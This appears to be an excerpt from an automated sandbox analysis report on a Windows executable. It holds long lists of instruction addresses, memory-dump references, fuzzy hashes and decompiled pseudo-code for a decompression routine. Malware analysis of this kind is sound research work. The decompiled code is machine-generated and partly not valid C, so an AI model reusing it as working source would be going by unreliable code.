                                                                                                        0x004067cc
                                                                                                        0x004067cf
                                                                                                        0x004067d5
                                                                                                        0x004067e0
                                                                                                        0x004067e0
                                                                                                        0x004067e2
                                                                                                        0x004067b4
                                                                                                        0x004067b4
                                                                                                        0x004067c3
                                                                                                        0x004067c7
                                                                                                        0x004067c7
                                                                                                        0x004067ec
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004067ee
                                                                                                        0x004067f2
                                                                                                        0x004069a1
                                                                                                        0x00000000
                                                                                                        0x004069a1
                                                                                                        0x004067fe
                                                                                                        0x00406805
                                                                                                        0x0040680d
                                                                                                        0x00406810
                                                                                                        0x00406813
                                                                                                        0x00406813
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406131
                                                                                                        0x00406133
                                                                                                        0x00406136
                                                                                                        0x004061a7
                                                                                                        0x004061aa
                                                                                                        0x004061ad
                                                                                                        0x004061b4
                                                                                                        0x004061be
                                                                                                        0x00000000
                                                                                                        0x004061be
                                                                                                        0x00406138
                                                                                                        0x0040613c
                                                                                                        0x0040613f
                                                                                                        0x00406141
                                                                                                        0x00406144
                                                                                                        0x00406147
                                                                                                        0x00406149
                                                                                                        0x0040614c
                                                                                                        0x0040614e
                                                                                                        0x00406153
                                                                                                        0x00406156
                                                                                                        0x00406159
                                                                                                        0x0040615d
                                                                                                        0x00406164
                                                                                                        0x00406167
                                                                                                        0x0040616e
                                                                                                        0x00406172
                                                                                                        0x0040617a
                                                                                                        0x0040617a
                                                                                                        0x0040617a
                                                                                                        0x00406174
                                                                                                        0x00406174
                                                                                                        0x00406174
                                                                                                        0x00406169
                                                                                                        0x00406169
                                                                                                        0x00406169
                                                                                                        0x0040617e
                                                                                                        0x00406181
                                                                                                        0x0040619f
                                                                                                        0x004061a1
                                                                                                        0x00000000
                                                                                                        0x00406183
                                                                                                        0x00406183
                                                                                                        0x00406186
                                                                                                        0x00406189
                                                                                                        0x0040618c
                                                                                                        0x0040618e
                                                                                                        0x0040618e
                                                                                                        0x0040618e
                                                                                                        0x00406191
                                                                                                        0x00406194
                                                                                                        0x00406196
                                                                                                        0x00406197
                                                                                                        0x0040619a
                                                                                                        0x00000000
                                                                                                        0x0040619a
                                                                                                        0x00000000
                                                                                                        0x004063d0
                                                                                                        0x004063d4
                                                                                                        0x004063f2
                                                                                                        0x004063f5
                                                                                                        0x004063fc
                                                                                                        0x004063ff
                                                                                                        0x00406402
                                                                                                        0x00406405
                                                                                                        0x00406408
                                                                                                        0x0040640b
                                                                                                        0x0040640d
                                                                                                        0x00406414
                                                                                                        0x00406415
                                                                                                        0x00406417
                                                                                                        0x0040641a
                                                                                                        0x0040641d
                                                                                                        0x00406420
                                                                                                        0x00406420
                                                                                                        0x00406425
                                                                                                        0x00000000
                                                                                                        0x00406425
                                                                                                        0x004063d6
                                                                                                        0x004063d9
                                                                                                        0x004063dc
                                                                                                        0x004063e6
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040643a
                                                                                                        0x0040643e
                                                                                                        0x00406461
                                                                                                        0x00406464
                                                                                                        0x00406467
                                                                                                        0x00406471
                                                                                                        0x00406440
                                                                                                        0x00406440
                                                                                                        0x00406443
                                                                                                        0x00406446
                                                                                                        0x00406449
                                                                                                        0x00406456
                                                                                                        0x00406459
                                                                                                        0x00406459
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040647d
                                                                                                        0x00406481
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406487
                                                                                                        0x0040648b
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406491
                                                                                                        0x00406493
                                                                                                        0x00406497
                                                                                                        0x00406497
                                                                                                        0x0040649a
                                                                                                        0x0040649e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004064ee
                                                                                                        0x004064f2
                                                                                                        0x004064f9
                                                                                                        0x004064fc
                                                                                                        0x004064ff
                                                                                                        0x00406509
                                                                                                        0x00000000
                                                                                                        0x00406509
                                                                                                        0x004064f4
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406515
                                                                                                        0x00406519
                                                                                                        0x00406520
                                                                                                        0x00406523
                                                                                                        0x00406526
                                                                                                        0x0040651b
                                                                                                        0x0040651b
                                                                                                        0x0040651b
                                                                                                        0x00406529
                                                                                                        0x0040652c
                                                                                                        0x0040652f
                                                                                                        0x0040652f
                                                                                                        0x00406532
                                                                                                        0x00406535
                                                                                                        0x00406538
                                                                                                        0x00406538
                                                                                                        0x0040653b
                                                                                                        0x00406542
                                                                                                        0x00406547
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004065d5
                                                                                                        0x004065d5
                                                                                                        0x004065d9
                                                                                                        0x00406977
                                                                                                        0x00000000
                                                                                                        0x00406977
                                                                                                        0x004065df
                                                                                                        0x004065e2
                                                                                                        0x004065e5
                                                                                                        0x004065e9
                                                                                                        0x004065ec
                                                                                                        0x004065f2
                                                                                                        0x004065f4
                                                                                                        0x004065f4
                                                                                                        0x004065f4
                                                                                                        0x004065f7
                                                                                                        0x004065fa
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004061ca
                                                                                                        0x004061ca
                                                                                                        0x004061ce
                                                                                                        0x0040693b
                                                                                                        0x00000000
                                                                                                        0x0040693b
                                                                                                        0x004061d4
                                                                                                        0x004061d7
                                                                                                        0x004061da
                                                                                                        0x004061de
                                                                                                        0x004061e1
                                                                                                        0x004061e7
                                                                                                        0x004061e9
                                                                                                        0x004061e9
                                                                                                        0x004061e9
                                                                                                        0x004061ec
                                                                                                        0x004061ef
                                                                                                        0x004061ef
                                                                                                        0x004061f2
                                                                                                        0x004061f5
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004061fb
                                                                                                        0x00406201
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406207
                                                                                                        0x00406207
                                                                                                        0x0040620b
                                                                                                        0x0040620e
                                                                                                        0x00406211
                                                                                                        0x00406214
                                                                                                        0x00406217
                                                                                                        0x00406218
                                                                                                        0x0040621b
                                                                                                        0x0040621d
                                                                                                        0x00406223
                                                                                                        0x00406226
                                                                                                        0x00406229
                                                                                                        0x0040622c
                                                                                                        0x0040622f
                                                                                                        0x00406232
                                                                                                        0x00406235
                                                                                                        0x00406251
                                                                                                        0x00406254
                                                                                                        0x00406257
                                                                                                        0x0040625a
                                                                                                        0x00406261
                                                                                                        0x00406265
                                                                                                        0x00406267
                                                                                                        0x0040626b
                                                                                                        0x00406237
                                                                                                        0x00406237
                                                                                                        0x0040623b
                                                                                                        0x00406243
                                                                                                        0x00406248
                                                                                                        0x0040624a
                                                                                                        0x0040624c
                                                                                                        0x0040624c
                                                                                                        0x0040626e
                                                                                                        0x00406275
                                                                                                        0x00406278
                                                                                                        0x00000000
                                                                                                        0x0040627e
                                                                                                        0x00000000
                                                                                                        0x0040627e
                                                                                                        0x00000000
                                                                                                        0x00406283
                                                                                                        0x00406283
                                                                                                        0x00406287
                                                                                                        0x00406947
                                                                                                        0x00000000
                                                                                                        0x00406947
                                                                                                        0x0040628d
                                                                                                        0x00406290
                                                                                                        0x00406293
                                                                                                        0x00406297
                                                                                                        0x0040629a
                                                                                                        0x004062a0
                                                                                                        0x004062a2
                                                                                                        0x004062a2
                                                                                                        0x004062a2
                                                                                                        0x004062a5
                                                                                                        0x004062a8
                                                                                                        0x004062a8
                                                                                                        0x004062a8
                                                                                                        0x004062ae
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004062b0
                                                                                                        0x004062b3
                                                                                                        0x004062b6
                                                                                                        0x004062b9
                                                                                                        0x004062bc
                                                                                                        0x004062bf
                                                                                                        0x004062c2
                                                                                                        0x004062c5
                                                                                                        0x004062c8
                                                                                                        0x004062cb
                                                                                                        0x004062ce
                                                                                                        0x004062e6
                                                                                                        0x004062e9
                                                                                                        0x004062ec
                                                                                                        0x004062ef
                                                                                                        0x004062ef
                                                                                                        0x004062f2
                                                                                                        0x004062f6
                                                                                                        0x004062f8
                                                                                                        0x004062d0
                                                                                                        0x004062d0
                                                                                                        0x004062d8
                                                                                                        0x004062dd
                                                                                                        0x004062df
                                                                                                        0x004062e1
                                                                                                        0x004062e1
                                                                                                        0x004062fb
                                                                                                        0x00406302
                                                                                                        0x00406305
                                                                                                        0x00000000
                                                                                                        0x00406307
                                                                                                        0x00000000
                                                                                                        0x00406307
                                                                                                        0x00406305
                                                                                                        0x0040630c
                                                                                                        0x0040630c
                                                                                                        0x0040630c
                                                                                                        0x0040630c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406347
                                                                                                        0x00406347
                                                                                                        0x0040634b
                                                                                                        0x00406953
                                                                                                        0x00000000
                                                                                                        0x00406953
                                                                                                        0x00406351
                                                                                                        0x00406354
                                                                                                        0x00406357
                                                                                                        0x0040635b
                                                                                                        0x0040635e
                                                                                                        0x00406364
                                                                                                        0x00406366
                                                                                                        0x00406366
                                                                                                        0x00406366
                                                                                                        0x00406369
                                                                                                        0x0040636c
                                                                                                        0x0040636c
                                                                                                        0x00406372
                                                                                                        0x00406310
                                                                                                        0x00406310
                                                                                                        0x00406313
                                                                                                        0x00000000
                                                                                                        0x00406313
                                                                                                        0x00406374
                                                                                                        0x00406374
                                                                                                        0x00406377
                                                                                                        0x0040637a
                                                                                                        0x0040637d
                                                                                                        0x00406380
                                                                                                        0x00406383
                                                                                                        0x00406386
                                                                                                        0x00406389
                                                                                                        0x0040638c
                                                                                                        0x0040638f
                                                                                                        0x00406392
                                                                                                        0x004063aa
                                                                                                        0x004063ad
                                                                                                        0x004063b0
                                                                                                        0x004063b3
                                                                                                        0x004063b3
                                                                                                        0x004063b6
                                                                                                        0x004063ba
                                                                                                        0x004063bc
                                                                                                        0x00406394
                                                                                                        0x00406394
                                                                                                        0x0040639c
                                                                                                        0x004063a1
                                                                                                        0x004063a3
                                                                                                        0x004063a5
                                                                                                        0x004063a5
                                                                                                        0x004063bf
                                                                                                        0x004063c6
                                                                                                        0x004063c9
                                                                                                        0x00000000
                                                                                                        0x004063cb
                                                                                                        0x00000000
                                                                                                        0x004063cb
                                                                                                        0x00000000
                                                                                                        0x00406658
                                                                                                        0x00406658
                                                                                                        0x0040665c
                                                                                                        0x00406983
                                                                                                        0x00000000
                                                                                                        0x00406983
                                                                                                        0x00406662
                                                                                                        0x00406665
                                                                                                        0x00406668
                                                                                                        0x0040666c
                                                                                                        0x0040666f
                                                                                                        0x00406675
                                                                                                        0x00406677
                                                                                                        0x00406677
                                                                                                        0x00406677
                                                                                                        0x0040667a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406428
                                                                                                        0x00406428
                                                                                                        0x0040642b
                                                                                                        0x0040679d
                                                                                                        0x0040679d
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406824
                                                                                                        0x00406828
                                                                                                        0x00406846
                                                                                                        0x00406846
                                                                                                        0x00406846
                                                                                                        0x0040684d
                                                                                                        0x00406854
                                                                                                        0x00000000
                                                                                                        0x00406854
                                                                                                        0x0040682a
                                                                                                        0x0040682d
                                                                                                        0x00406830
                                                                                                        0x00406833
                                                                                                        0x0040683a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406915
                                                                                                        0x00406918
                                                                                                        0x00406819
                                                                                                        0x00406819
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040654f
                                                                                                        0x00406551
                                                                                                        0x00406558
                                                                                                        0x00406559
                                                                                                        0x0040655b
                                                                                                        0x0040655e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406566
                                                                                                        0x00406569
                                                                                                        0x0040656c
                                                                                                        0x0040656e
                                                                                                        0x00406570
                                                                                                        0x00406570
                                                                                                        0x00406571
                                                                                                        0x00406574
                                                                                                        0x0040657b
                                                                                                        0x0040657e
                                                                                                        0x0040658c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406871
                                                                                                        0x00406871
                                                                                                        0x00406875
                                                                                                        0x004069ad
                                                                                                        0x00000000
                                                                                                        0x004069ad
                                                                                                        0x0040687b
                                                                                                        0x0040687e
                                                                                                        0x00406881
                                                                                                        0x00406885
                                                                                                        0x00406888
                                                                                                        0x0040688e
                                                                                                        0x00406890
                                                                                                        0x00406890
                                                                                                        0x00406890
                                                                                                        0x00406893
                                                                                                        0x00406896
                                                                                                        0x00406896
                                                                                                        0x00406896
                                                                                                        0x00406896
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406594
                                                                                                        0x00406597
                                                                                                        0x004065cd
                                                                                                        0x004066fd
                                                                                                        0x004066fd
                                                                                                        0x004066fd
                                                                                                        0x004066fd
                                                                                                        0x00406700
                                                                                                        0x00406700
                                                                                                        0x00406703
                                                                                                        0x00406705
                                                                                                        0x0040698f
                                                                                                        0x00000000
                                                                                                        0x0040698f
                                                                                                        0x0040670b
                                                                                                        0x0040670e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406714
                                                                                                        0x00406718
                                                                                                        0x0040671b
                                                                                                        0x0040671b
                                                                                                        0x0040671b
                                                                                                        0x00000000
                                                                                                        0x0040671b
                                                                                                        0x00406599
                                                                                                        0x0040659b
                                                                                                        0x0040659d
                                                                                                        0x0040659f
                                                                                                        0x004065a2
                                                                                                        0x004065a3
                                                                                                        0x004065a5
                                                                                                        0x004065a7
                                                                                                        0x004065aa
                                                                                                        0x004065ad
                                                                                                        0x004065c3
                                                                                                        0x004065c8
                                                                                                        0x00406600
                                                                                                        0x00406600
                                                                                                        0x00406604
                                                                                                        0x00406630
                                                                                                        0x00406632
                                                                                                        0x00406639
                                                                                                        0x0040663c
                                                                                                        0x0040663f
                                                                                                        0x0040663f
                                                                                                        0x00406644
                                                                                                        0x00406644
                                                                                                        0x00406646
                                                                                                        0x00406649
                                                                                                        0x00406650
                                                                                                        0x00406653
                                                                                                        0x00406680
                                                                                                        0x00406680
                                                                                                        0x00406683
                                                                                                        0x00406686
                                                                                                        0x004066fa
                                                                                                        0x004066fa
                                                                                                        0x004066fa
                                                                                                        0x00000000
                                                                                                        0x004066fa
                                                                                                        0x00406688
                                                                                                        0x0040668e
                                                                                                        0x00406691
                                                                                                        0x00406694
                                                                                                        0x00406697
                                                                                                        0x0040669a
                                                                                                        0x0040669d
                                                                                                        0x004066a0
                                                                                                        0x004066a3
                                                                                                        0x004066a6
                                                                                                        0x004066a9
                                                                                                        0x004066c2
                                                                                                        0x004066c4
                                                                                                        0x004066c7
                                                                                                        0x004066c8
                                                                                                        0x004066cb
                                                                                                        0x004066cd
                                                                                                        0x004066d0
                                                                                                        0x004066d2
                                                                                                        0x004066d4
                                                                                                        0x004066d7
                                                                                                        0x004066d9
                                                                                                        0x004066dc
                                                                                                        0x004066e0
                                                                                                        0x004066e2
                                                                                                        0x004066e2
                                                                                                        0x004066e3
                                                                                                        0x004066e6
                                                                                                        0x004066e9
                                                                                                        0x004066ab
                                                                                                        0x004066ab
                                                                                                        0x004066b3
                                                                                                        0x004066b8
                                                                                                        0x004066ba
                                                                                                        0x004066bd
                                                                                                        0x004066bd
                                                                                                        0x004066ec
                                                                                                        0x004066f3
                                                                                                        0x0040667d
                                                                                                        0x0040667d
                                                                                                        0x0040667d
                                                                                                        0x0040667d
                                                                                                        0x00000000
                                                                                                        0x004066f5
                                                                                                        0x00000000
                                                                                                        0x004066f5
                                                                                                        0x004066f3
                                                                                                        0x00406606
                                                                                                        0x00406609
                                                                                                        0x0040660b
                                                                                                        0x0040660e
                                                                                                        0x00406611
                                                                                                        0x00406614
                                                                                                        0x00406616
                                                                                                        0x00406619
                                                                                                        0x0040661c
                                                                                                        0x0040661c
                                                                                                        0x0040661f
                                                                                                        0x0040661f
                                                                                                        0x00406622
                                                                                                        0x00406629
                                                                                                        0x004065fd
                                                                                                        0x004065fd
                                                                                                        0x004065fd
                                                                                                        0x004065fd
                                                                                                        0x00000000
                                                                                                        0x0040662b
                                                                                                        0x00000000
                                                                                                        0x0040662b
                                                                                                        0x00406629
                                                                                                        0x004065af
                                                                                                        0x004065b2
                                                                                                        0x004065b4
                                                                                                        0x004065b7
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406316
                                                                                                        0x00406316
                                                                                                        0x0040631a
                                                                                                        0x0040695f
                                                                                                        0x00000000
                                                                                                        0x0040695f
                                                                                                        0x00406320
                                                                                                        0x00406323
                                                                                                        0x00406326
                                                                                                        0x00406329
                                                                                                        0x0040632c
                                                                                                        0x0040632f
                                                                                                        0x00406332
                                                                                                        0x00406334
                                                                                                        0x00406337
                                                                                                        0x0040633a
                                                                                                        0x0040633d
                                                                                                        0x0040633f
                                                                                                        0x0040633f
                                                                                                        0x0040633f
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004064a1
                                                                                                        0x004064a1
                                                                                                        0x004064a5
                                                                                                        0x0040696b
                                                                                                        0x00000000
                                                                                                        0x0040696b
                                                                                                        0x004064ab
                                                                                                        0x004064ae
                                                                                                        0x004064b1
                                                                                                        0x004064b4
                                                                                                        0x004064b6
                                                                                                        0x004064b6
                                                                                                        0x004064b6
                                                                                                        0x004064b9
                                                                                                        0x004064bc
                                                                                                        0x004064bf
                                                                                                        0x004064c2
                                                                                                        0x004064c5
                                                                                                        0x004064c8
                                                                                                        0x004064c9
                                                                                                        0x004064cb
                                                                                                        0x004064cb
                                                                                                        0x004064cb
                                                                                                        0x004064ce
                                                                                                        0x004064d1
                                                                                                        0x004064d4
                                                                                                        0x004064d7
                                                                                                        0x004064d7
                                                                                                        0x004064d7
                                                                                                        0x004064da
                                                                                                        0x004064dc
                                                                                                        0x004064dc
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040671e
                                                                                                        0x0040671e
                                                                                                        0x0040671e
                                                                                                        0x00406722
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406728
                                                                                                        0x0040672b
                                                                                                        0x0040672e
                                                                                                        0x00406731
                                                                                                        0x00406733
                                                                                                        0x00406733
                                                                                                        0x00406733
                                                                                                        0x00406736
                                                                                                        0x00406739
                                                                                                        0x0040673c
                                                                                                        0x0040673f
                                                                                                        0x00406742
                                                                                                        0x00406745
                                                                                                        0x00406746
                                                                                                        0x00406748
                                                                                                        0x00406748
                                                                                                        0x00406748
                                                                                                        0x0040674b
                                                                                                        0x0040674e
                                                                                                        0x00406751
                                                                                                        0x00406754
                                                                                                        0x00406757
                                                                                                        0x0040675b
                                                                                                        0x0040675d
                                                                                                        0x00406760
                                                                                                        0x00000000
                                                                                                        0x00406762
                                                                                                        0x004064df
                                                                                                        0x004064df
                                                                                                        0x00000000
                                                                                                        0x004064df
                                                                                                        0x00406760
                                                                                                        0x00406995
                                                                                                        0x004069b7
                                                                                                        0x004069bd
                                                                                                        0x004069bf
                                                                                                        0x004069c6
                                                                                                        0x004069c8
                                                                                                        0x004069cf
                                                                                                        0x004069d3
                                                                                                        0x00000000
                                                                                                        0x00405fc4
                                                                                                        0x004069cc
                                                                                                        0x004069cc
                                                                                                        0x00000000
                                                                                                        0x004069cc
                                                                                                        0x00406819
                                                                                                        0x0040689f
                                                                                                        0x004068a5
                                                                                                        0x004068a8
                                                                                                        0x004068ab
                                                                                                        0x004068ae
                                                                                                        0x004068b1
                                                                                                        0x004068b4
                                                                                                        0x004068b7
                                                                                                        0x004068ba
                                                                                                        0x004068c0
                                                                                                        0x004068d9
                                                                                                        0x004068dc
                                                                                                        0x004068df
                                                                                                        0x004068e2
                                                                                                        0x004068e6
                                                                                                        0x004068e8
                                                                                                        0x004068e9
                                                                                                        0x004068ec
                                                                                                        0x004068c2
                                                                                                        0x004068c2
                                                                                                        0x004068ca
                                                                                                        0x004068cf
                                                                                                        0x004068d1
                                                                                                        0x004068d4
                                                                                                        0x004068d4
                                                                                                        0x004068f6
                                                                                                        0x00000000
                                                                                                        0x004068f8
                                                                                                        0x00000000
                                                                                                        0x004068f8
                                                                                                        0x004068f6
                                                                                                        0x00000000
                                                                                                        0x0040676b

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.218416556.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.218411808.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218423137.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218427563.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218437653.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218442008.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218447118.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: d0b545a720d06a2780d8eb9310de1c164ea8e259f40aa19cdef3f662a7789f4d
                                                                                                        • Instruction ID: 868f2ec1f3ea74d7de1394d818727f69d5aca31e92bf34b5737afca42cfaef71
                                                                                                        • Opcode Fuzzy Hash: d0b545a720d06a2780d8eb9310de1c164ea8e259f40aa19cdef3f662a7789f4d
                                                                                                        • Instruction Fuzzy Hash: 6E913171D00229CBEF28CF98C8547ADBBB1FF44305F15812AD856BB281C7789A9ADF44
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0040647D, Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 98%
                                                                                                        			E0040647D() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M004069D4))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8));
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
